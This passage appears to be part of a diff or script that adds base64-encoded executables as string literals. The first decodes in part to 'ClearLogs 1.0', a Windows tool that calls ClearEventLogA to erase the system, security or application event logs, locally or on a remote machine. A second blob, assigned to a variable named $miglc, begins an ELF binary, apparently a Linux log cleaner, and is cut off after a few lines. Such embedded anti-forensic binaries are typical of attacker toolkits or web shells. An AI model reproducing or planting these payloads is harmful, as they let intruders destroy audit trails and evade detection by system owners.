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
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAADyVQAA4FUAANBVAAAAAAAAslUAAKBVAABWVwAAEFYAAB5WAAAyVgAA
+RlYAAFhWAABmVgAAglYAAJhWAACyVgAAzFYAAOJWAAD6VgAAFFcAACZXAAA2VwAARFcAAJRVAABk
+VwAAclcAAIBXAACMVwAAmFcAAKRXAACwVwAAvFcAAMZXAADSVwAA4lcAAPBXAAACWAAAElgAACZY
+AAA4WAAATlgAAF5YAABuWAAAgFgAAJJYAACiWAAAAAAAAAAAAAD/////zhZAAOIWQAAGAAAGAAEA
+ABAAAwYABgIQBEVFRQUFBQUFNTAAUAAAAAAgKDhQWAcIADcwMFdQBwAAICAIAAAAAAhgaGBgYGAA
+AHBweHh4eAgHCAAABwAICAgAAAgACAAHCAAAACgAbgB1AGwAbAApAAAAAAAobnVsbCkAAHJ1bnRp
+bWUgZXJyb3IgAAANCgAAVExPU1MgZXJyb3INCgAAAFNJTkcgZXJyb3INCgAAAABET01BSU4gZXJy
+b3INCgAAUjYwMjgNCi0gdW5hYmxlIHRvIGluaXRpYWxpemUgaGVhcA0KAAAAAFI2MDI3DQotIG5v
+dCBlbm91Z2ggc3BhY2UgZm9yIGxvd2lvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjYNCi0gbm90
+IGVub3VnaCBzcGFjZSBmb3Igc3RkaW8gaW5pdGlhbGl6YXRpb24NCgAAAABSNjAyNQ0KLSBwdXJl
+IHZpcnR1YWwgZnVuY3Rpb24gY2FsbA0KAAAAUjYwMjQNCi0gbm90IGVub3VnaCBzcGFjZSBmb3Ig
+X29uZXhpdC9hdGV4aXQgdGFibGUNCgAAAABSNjAxOQ0KLSB1bmFibGUgdG8gb3BlbiBjb25zb2xl
+IGRldmljZQ0KAAAAAFI2MDE4DQotIHVuZXhwZWN0ZWQgaGVhcCBlcnJvcg0KAAAAAFI2MDE3DQot
+IHVuZXhwZWN0ZWQgbXVsdGl0aHJlYWQgbG9jayBlcnJvcg0KAAAAAFI2MDE2DQotIG5vdCBlbm91
+Z2ggc3BhY2UgZm9yIHRocmVhZCBkYXRhDQoADQphYm5vcm1hbCBwcm9ncmFtIHRlcm1pbmF0aW9u
+DQoAAAAAUjYwMDkNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgZW52aXJvbm1lbnQNCgBSNjAwOA0K
+LSBub3QgZW5vdWdoIHNwYWNlIGZvciBhcmd1bWVudHMNCgAAAFI2MDAyDQotIGZsb2F0aW5nIHBv
+aW50IG5vdCBsb2FkZWQNCgAAAABNaWNyb3NvZnQgVmlzdWFsIEMrKyBSdW50aW1lIExpYnJhcnkA
+AAAACgoAAFJ1bnRpbWUgRXJyb3IhCgpQcm9ncmFtOiAAAAAuLi4APHByb2dyYW0gbmFtZSB1bmtu
+b3duPgAAR2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEAdXNl
+cjMyLmRsbAAAAAAAAAAAAAAAAAAA//////5GQAACR0AA/////7JHQAC2R0AA/////zZJQAA6SUAA
+6FQAAAAAAAAAAAAAwlUAABBQAADYVAAAAAAAAAAAAAACVgAAAFAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAA8lUAAOBVAADQVQAAAAAAALJVAACgVQAAVlcAABBWAAAeVgAAMlYAAEZWAABYVgAAZlYAAIJW
+AACYVgAAslYAAMxWAADiVgAA+lYAABRXAAAmVwAANlcAAERXAACUVQAAZFcAAHJXAACAVwAAjFcA
+AJhXAACkVwAAsFcAALxXAADGVwAA0lcAAOJXAADwVwAAAlgAABJYAAAmWAAAOFgAAE5YAABeWAAA
+blgAAIBYAACSWAAAolgAAAAAAADMAUxvY2FsRnJlZQCvAEZvcm1hdE1lc3NhZ2VBAAAaAUdldExh
+c3RFcnJvcgAAS0VSTkVMMzIuZGxsAAAyAENsb3NlRXZlbnRMb2cAMABDbGVhckV2ZW50TG9nQQAA
+QAFPcGVuRXZlbnRMb2dBAEFEVkFQSTMyLmRsbAAAfQBFeGl0UHJvY2VzcwCeAlRlcm1pbmF0ZVBy
+b2Nlc3MAAPcAR2V0Q3VycmVudFByb2Nlc3MAygBHZXRDb21tYW5kTGluZUEAdAFHZXRWZXJzaW9u
+AACtAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAJAFHZXRNb2R1bGVGaWxlTmFtZUEAALIARnJl
+ZUVudmlyb25tZW50U3RyaW5nc0EAswBGcmVlRW52aXJvbm1lbnRTdHJpbmdzVwDSAldpZGVDaGFy
+VG9NdWx0aUJ5dGUABgFHZXRFbnZpcm9ubWVudFN0cmluZ3MACAFHZXRFbnZpcm9ubWVudFN0cmlu
+Z3NXAABtAlNldEhhbmRsZUNvdW50AABSAUdldFN0ZEhhbmRsZQAAFQFHZXRGaWxlVHlwZQBQAUdl
+dFN0YXJ0dXBJbmZvQQCdAUhlYXBEZXN0cm95AJsBSGVhcENyZWF0ZQAAvwJWaXJ0dWFsRnJlZQCf
+AUhlYXBGcmVlAAAvAlJ0bFVud2luZADfAldyaXRlRmlsZQCZAUhlYXBBbGxvYwC/AEdldENQSW5m
+bwC5AEdldEFDUAAAMQFHZXRPRU1DUAAAuwJWaXJ0dWFsQWxsb2MAAKIBSGVhcFJlQWxsb2MAPgFH
+ZXRQcm9jQWRkcmVzcwAAwgFMb2FkTGlicmFyeUEAAKoARmx1c2hGaWxlQnVmZmVycwAAagJTZXRG
+aWxlUG9pbnRlcgAA5AFNdWx0aUJ5dGVUb1dpZGVDaGFyAL8BTENNYXBTdHJpbmdBAADAAUxDTWFw
+U3RyaW5nVwAAUwFHZXRTdHJpbmdUeXBlQQAAVgFHZXRTdHJpbmdUeXBlVwAAfAJTZXRTdGRIYW5k
+bGUAABsAQ2xvc2VIYW5kbGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAACiBAABQ2QAAAAAAAAAAAAK8gQAAAAAAAAAAAAAAAAAAAAAAA
+U3VjY2VzczogVGhlIGxvZyBoYXMgYmVlbiBjbGVhcmVkCgAARXJyb3I6IFVuYWJsZSB0byBjbGVh
+ciBsb2cgLSAAAAAlcwoARXJyb3I6IFVuYWJsZSB0byBvcGVuIGxvZyAtIAAAAAAgICAgICAgIC1z
+eXMgPSBzeXN0ZW0gbG9nCgAAICAgICAgICAtc2VjID0gc2VjdXJpdHkgbG9nCgAAAAAgICAgICAg
+IC1hcHAgPSBhcHBsaWNhdGlvbiBsb2cKACBVc2FnZTogY2xlYXJsb2dzIFtcXGNvbXB1dGVybmFt
+ZV0gPC1hcHAgLyAtc2VjIC8gLXN5cz4KCgAAAFN5c3RlbQAALXN5cwAAAABTZWN1cml0eQAAAAAt
+c2VjAAAAAEFwcGxpY2F0aW9uAC1hcHAAAAAAICAgICAgICAgICAgICAtIGh0dHA6Ly9udHNlY3Vy
+aXR5Lm51L3Rvb2xib3gvY2xlYXJsb2dzLwoKAAAAQ2xlYXJMb2dzIDEuMCAtIChjKSAyMDAyLCBB
+cm5lIFZpZHN0cm9tIChhcm5lLnZpZHN0cm9tQG50c2VjdXJpdHkubnUpCgAACgAAAA4UQAABAAAA
+OFFAAChRQADAcUAAAAAAAMBxQAABAQAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAB
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAwAsAAAAAAAAAHQAAwAQAAAAAAAAAlgAAwAQAAAAAAAAA
+jQAAwAgAAAAAAAAAjgAAwAgAAAAAAAAAjwAAwAgAAAAAAAAAkAAAwAgAAAAAAAAAkQAAwAgAAAAA
+AAAAkgAAwAgAAAAAAAAAkwAAwAgAAAAAAAAAAwAAAAcAAAAKAAAAjAAAAP////8ACgAAEAAAACAF
+kxkAAAAAAAAAAAAAAAAAAAAAAgAAAKRTQAAIAAAAeFNAAAkAAABMU0AACgAAAChTQAAQAAAA/FJA
+ABEAAADMUkAAEgAAAKhSQAATAAAAfFJAABgAAABEUkAAGQAAABxSQAAaAAAA5FFAABsAAACsUUAA
+HAAAAIRRQAB4AAAAdFFAAHkAAABkUUAAegAAAFRRQAD8AAAAUFFAAP8AAABAUUAAAAAAAAAAAABW
+REAAVkRAAFZEQABWREAAVkRAAFZEQADiZUAA4mVAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgA
+KAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQ
+ABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEA
+gQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACC
+AIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAA
+EAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECBAgAAAAApAMA
+AGCCeYIhAAAAAAAAAKbfAAAAAAAAoaUAAAAAAACBn+D8AAAAAEB+gPwAAAAAqAMAAMGj2qMgAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAACB/gAAAAAAAED+AAAAAAAAtQMAAMGj2qMgAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAACB/gAAAAAAAEH+AAAAAAAAtgMAAM+i5KIaAOWi6KJbAAAAAAAAAAAAAAAAAAAA
+AACB/gAAAAAAAEB+of4AAAAAUQUAAFHaXtogAF/aatoyAAAAAAAAAAAAAAAAAAAAAACB09je4PkA
+ADF+gf4AAAAAAAAAAAAAAAD4AwAAAQAAAC4AAAABAAAAAQAAABYAAAACAAAAAgAAAAMAAAACAAAA
+BAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcAAAAL
+AAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAAACEA
+AAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAAVwAA
+ABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACAAAAA
+CgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEAAAAC
+AAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AA==";
+
+$miglc="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAIIgECDQAAAA0XAAAAAAAADQAIAAGACgAHgAbAAYAAAA0
+AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBMAAAATAAAABAAAAAEA
+AAABAAAAAAAAAACABAgAgAQI4DYAAOA2AAAFAAAAABAAAAEAAADgNgAA4MYECODGBAh0AQAAmAEA
